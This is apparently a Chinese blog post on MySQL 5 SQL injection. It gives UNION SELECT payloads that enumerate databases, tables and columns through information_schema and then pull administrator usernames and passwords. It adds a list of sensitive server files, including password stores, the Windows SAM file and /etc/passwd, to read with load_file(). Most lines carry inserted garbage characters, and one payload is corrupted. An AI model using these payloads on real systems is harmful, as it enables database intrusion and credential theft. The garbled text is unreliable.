mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
6 w! v2 Y% k1 U8 z! _0 G2 }3 C, z

) X3 g2 c+ [: ]7 }* `8 _
- ^6 z! ~9 p  G0 z; l  TMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
! A- P/ q, Y( ^% ^存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
' }5 R5 g' Q" {1 q  }明。
1.得到所有数据库名：
, b' ^9 G8 o( F, i, `9 U|SCHEMATA ->存储数据库名的表
) B4 ^7 Q# S( [* Y$ n" D, M|—字段：SCHEMA_NAME ->数据库名称

|TABLES ->存储表名
, f, H# R5 r  Y: S6 G" A|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
) A6 b6 y9 {: a" ~; n9 L5 ?2 f& J
1 T1 r9 y! W( T( ^7 k. ^$ m|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
|—字段：TABLE_NAME ->存储所属表的名称

|—字段：COLUMN_NAME ->该字段的名称
. O& E, M. T- Z+ t) o5 \
' l/ n% L$ B1 A#########################################################################
  L; ?1 F' J" i: r0 g0 }##
( B7 Y; ^% E& n0 c# m, q; Q) Q
) \& [" i7 A2 o1 ^. f0×001 获取系统信息:

, I. X# x% a. a! hunion select 1,2,3,4,5,concat
' M" H$ w1 H5 e8 w+ ?(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
( y9 r/ J: ^0 H+ S! b3 Z(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
0 q6 N% L4 z8 l/ k* [( I
! L) c  d; f, m* D! |# b% B9 O3 Q  y& Z* b/*

@@global.version_compile_os 获取系统版本

! I* H" b. a- T0 c, f8 Z4 D. z, ?@@datadir 数据库路径
database() 当前数据库名称
0x3c62723e 换行HEX值
/ K2 B$ D* ?, }9 R
*/

* C1 u4 j7 G" z# u9 `- E######################################################################
1 E  ]% b- l! c+ w* T3 |% w
0 O# V5 B# C3 J5 x0×002 获取表名
7 o  i0 W$ e+ R9 x
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
information_schema.tables where table_schema=0x67617264656e /*
# j. d6 P6 p2 B, \) {& A8 m% N! h
% Y% _. b0 S  o2 @( n: s/*

, K# P6 S2 d& s0x67617264656e 为当前数据库名

; M8 F3 v) _1 N+ p+ h+ r' @8 d% N0 Kgroup_concat(table_name) 使用group_concat函数 一步获得该库所有表名
- M: i" j* P' @2 G
% B( t# z5 O: P' a5 q9 c*/
% j8 c7 y) x1 t
######################################################################
, {! }- {1 ?- W
' x0 D) _3 }" j2 U/ A* L+ w0×003 获取字段
+ ~3 s5 B+ V  \6 j
5 b7 ^5 b  p: i4 A- G# o$ wunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from
6 ]6 ^; S$ W' c, k0 jinformation_schema.columns where table_name=0x61646d696e and


& c5 I$ x. x, s$ N* e  @: M& ^table_schema=0x67617264656e limit 1 /*
( X( ^+ |) _2 e" @& M
9 e. z4 U/ V1 A' k8 X6 h/*
( C( v& k' K/ r  U& J
group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

4 \# @; o: @" R# l* f0x61646d696e ->选择一个表
# j3 J' D* z6 A
0x67617264656e ->数据库名

*/
3 w- y, A1 L3 X+ g
% P7 a: F# j$ u; N9 n#####################################################################

8 S& M; H& m" J, ^2 E% L9 S0×004 获取数据

union select 1,2,3
+ I- P* ]$ H9 d,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
- y! e( m/ \, k' R1 l  F
4 K5 e! c( E7 w( M% ?. |  Cunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
(adpassword),6,7,8 from admin

# }! V0 h; b, d" J0 ]/*
1 X6 i8 b8 O6 W  \4 c$ a! _+ S9 V
0x3c62723e 换行符号HEX编码

* A1 X# H' N+ N; G8 [! @group_concat 同时获得该字段所有数据
1 f( R, ]2 [- t7 p; w4 d
*/
1 ~$ c; X2 p6 D. G6 y6 g

1 R- S9 C7 w$ s  Q2 u( s- o
/ o" z9 a$ t. _3 o+ G9 W, e

顺便添加一些mysql注入时非常有用的一些东西
2 V' M  n( q1 l* j
: j; U1 F  m, _  F- \简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。
3 X) A' G1 [9 U" v
1:system_user() 系统用户名
2:user()        用户名
$ a5 m: g( F) R4 \3:current_user()  当前用户名
6 C, N! V' g6 a9 \4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
3 Y: H$ C# _" r) o/ Z4 S9 M1 m7:load_file()   MYSQL读取本地文件的函数
- w! R7 }. R; ~8@datadir     读取数据库路径
9@basedir    MYSQL 安装路径
3 u9 g% A: p: Y  @' e; T10@version_compile_os   操作系统  Windows Server 2003,
收集的一些路径：
) O- t) L6 U' WWINDOWS下:
' `; u  c( s* a/ qc:/boot.ini          //查看系统版本
, {! z6 H4 v4 l& r6 X, s. e# ]c:/windows/php.ini   //php配置信息
, h/ d) t# n+ k, y, D) }( L4 x( i. gc:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
# p- l! ^/ e" r2 P, P2 o+ C( nc:/winnt/my.ini
8 X5 ?% N+ E, _6 N/ z7 y% hc:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
& x8 s7 L, B  d! N. U  Ic:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
5 S% _! n# d; `( ]2 Q2 z7 N) dc:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
! n& J' a% |- o2 Sc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
- }) C1 A& X1 n1 `5 s& B' xc:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
2 |" p  L, r. q- ~; bc:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
; l6 A5 j% m1 [; R9 D% Cc:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.

5 K; U5 u4 r. w4 l3 X* [
0 k' F9 P7 s& n) Rc:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
9 Y& C+ L% F2 ]7 dC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

4 @% [. ?  r) gLUNIX/UNIX下:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
4 u; ~; w; r3 h* y/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
& a6 Z* W% ]; r  M& I. r& d/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
, F9 r( j7 t1 }/etc/httpd/conf/httpd.conf // apache配置文件
6 J+ ^2 x& ~5 v: v, w$ w/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
3 s% h9 l% q) ?7 O! P& R/etc/redhat-release //系统版本
. n9 }! `1 d" q: r/ a/etc/issue
# T7 E. F# _1 q4 W+ v" z/etc/issue.net
. r# {  H) `) R, ^/usr/local/app/php5/lib/php.ini //PHP相关设置
* h& t/ m* |, _% j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
, ?( c# e; l) S3 {/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
) w  Q+ r* u7 c' Q9 X/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
  w( I. y0 n: O2 f/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
1 X  i- d  h/ }- breplace(load_file(0x2F6574632F706173737764),0x3c,0×20)
! U; X6 s# ]3 i9 {8 `7 u  Dreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
! u! n4 x9 j0 X5 [$ G% w. V/ H7 I上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
# B- P3 G9 e8 l+ f9 }' @